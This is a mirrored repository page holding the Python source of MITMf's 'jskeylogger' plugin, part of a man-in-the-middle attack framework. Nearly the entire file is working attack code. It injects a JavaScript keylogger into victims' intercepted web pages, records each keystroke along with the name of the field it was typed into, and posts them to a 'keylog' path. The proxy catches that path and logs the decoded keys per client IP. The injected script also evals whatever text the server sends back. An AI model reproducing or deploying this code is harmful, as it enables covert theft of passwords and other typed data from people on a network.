mirror of
https://github.com/byt3bl33d3r/MITMf.git
synced 2025-07-06 21:12:16 -07:00
The way MITMf hooks SSLstrip's functions has been modified to improve plugin code readability, additionally corrected some useless function hooks that were placed in early framework realeases and never removed. Replace plugin has been given it's own section in the config file currently the BeedAutorun and Javapwn plugins have to be cleaned up... BrowserProfile plugin's Pinlady code has been updated to the latest version (v0.9.0) and will now detect Flash player's version Javapwn plugin will be renamed to BrowserPwn and will support Flash exploits too , as supposed to only Java exploits Since we now have a built in SMB server, removed options to specify a host in the SMBauth plugin Tweaked the output of some plugins
168 lines
No EOL
4.7 KiB
Python
168 lines
No EOL
4.7 KiB
Python
#!/usr/bin/env python2.7
|
|
|
|
# Copyright (c) 2014-2016 Marcello Salvati
|
|
#
|
|
# This program is free software; you can redistribute it and/or
|
|
# modify it under the terms of the GNU General Public License as
|
|
# published by the Free Software Foundation; either version 3 of the
|
|
# License, or (at your option) any later version.
|
|
#
|
|
# This program is distributed in the hope that it will be useful, but
|
|
# WITHOUT ANY WARRANTY; without even the implied warranty of
|
|
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
|
|
# General Public License for more details.
|
|
#
|
|
# You should have received a copy of the GNU General Public License
|
|
# along with this program; if not, write to the Free Software
|
|
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
|
|
# USA
|
|
#
|
|
import logging
|
|
|
|
from plugins.plugin import Plugin
|
|
from plugins.Inject import Inject
|
|
from core.sergioproxy.ProxyPlugins import ProxyPlugins
|
|
|
|
mitmf_logger = logging.getLogger("mitmf")
|
|
|
|
class jskeylogger(Plugin):
|
|
name = "Javascript Keylogger"
|
|
optname = "jskeylogger"
|
|
desc = "Injects a javascript keylogger into clients webpages"
|
|
version = "0.2"
|
|
has_opts = False
|
|
|
|
def initialize(self, options):
|
|
inject = Inject()
|
|
inject.initialize(options)
|
|
inject.html_payload = self.msf_keylogger()
|
|
ProxyPlugins.getInstance().addPlugin(inject)
|
|
|
|
def clientRequest(self, request):
|
|
#Handle the plugin output
|
|
if 'keylog' in request.uri:
|
|
request.printPostData = False
|
|
|
|
client_ip = request.client.getClientIP()
|
|
|
|
raw_keys = request.postData.split("&&")[0]
|
|
keys = raw_keys.split(",")
|
|
del keys[0]; del(keys[len(keys)-1])
|
|
|
|
input_field = request.postData.split("&&")[1]
|
|
|
|
nice = ''
|
|
for n in keys:
|
|
if n == '9':
|
|
nice += "<TAB>"
|
|
elif n == '8':
|
|
nice = nice.replace(nice[-1:], "")
|
|
elif n == '13':
|
|
nice = ''
|
|
else:
|
|
try:
|
|
nice += n.decode('hex')
|
|
except:
|
|
mitmf_logger.error("{} [{}] Error decoding char: {}".format(client_ip, self.name, n))
|
|
|
|
mitmf_logger.info("{} [{}] Host: {} Field: {} Keys: {}".format(client_ip, self.name, request.headers['host'], input_field, nice))
|
|
|
|
def msf_keylogger(self):
|
|
#Stolen from the Metasploit module http_javascript_keylogger, modified to work in Android and IOS
|
|
|
|
payload = """<script type="text/javascript">
|
|
window.onload = function mainfunc(){
|
|
var2 = ",";
|
|
name = '';
|
|
function make_xhr(){
|
|
var xhr;
|
|
try {
|
|
xhr = new XMLHttpRequest();
|
|
} catch(e) {
|
|
try {
|
|
xhr = new ActiveXObject("Microsoft.XMLHTTP");
|
|
} catch(e) {
|
|
xhr = new ActiveXObject("MSXML2.ServerXMLHTTP");
|
|
}
|
|
}
|
|
if(!xhr) {
|
|
throw "failed to create XMLHttpRequest";
|
|
}
|
|
return xhr;
|
|
}
|
|
|
|
xhr = make_xhr();
|
|
xhr.onreadystatechange = function() {
|
|
if(xhr.readyState == 4 && (xhr.status == 200 || xhr.status == 304)) {
|
|
eval(xhr.responseText);
|
|
}
|
|
}
|
|
|
|
if (window.addEventListener) {
|
|
document.addEventListener('keypress', function2, true);
|
|
document.addEventListener('keydown', function1, true);
|
|
} else if (window.attachEvent) {
|
|
document.attachEvent('onkeypress', function2);
|
|
document.attachEvent('onkeydown', function1);
|
|
} else {
|
|
document.onkeypress = function2;
|
|
document.onkeydown = function1;
|
|
}
|
|
|
|
}
|
|
|
|
function function2(e)
|
|
{
|
|
srcname = window.event.srcElement.name;
|
|
var3 = (window.event) ? window.event.keyCode : e.which;
|
|
var3 = var3.toString(16);
|
|
|
|
if (var3 != "d")
|
|
{
|
|
andxhr(var3, srcname);
|
|
}
|
|
}
|
|
|
|
function function1(e)
|
|
{
|
|
srcname = window.event.srcElement.name;
|
|
id = window.event.srcElement.id;
|
|
|
|
var3 = (window.event) ? window.event.keyCode : e.which;
|
|
if (var3 == 9 || var3 == 8 || var3 == 13)
|
|
{
|
|
andxhr(var3, srcname);
|
|
}
|
|
else if (var3 == 0)
|
|
{
|
|
|
|
text = document.getElementById(id).value;
|
|
if (text.length != 0)
|
|
{
|
|
andxhr(text.toString(16), srcname);
|
|
}
|
|
}
|
|
}
|
|
|
|
function andxhr(key, inputName)
|
|
{
|
|
if (inputName != name)
|
|
{
|
|
name = inputName;
|
|
var2 = ",";
|
|
}
|
|
|
|
var2= var2 + key + ",";
|
|
|
|
xhr.open("POST", "keylog", true);
|
|
xhr.setRequestHeader("Content-type","application/x-www-form-urlencoded");
|
|
xhr.send(var2 + '&&' + inputName);
|
|
|
|
if (key == 13 || var2.length > 3000)
|
|
{
|
|
var2 = ",";
|
|
}
|
|
}
|
|
</script>"""
|
|
|
|
return payload |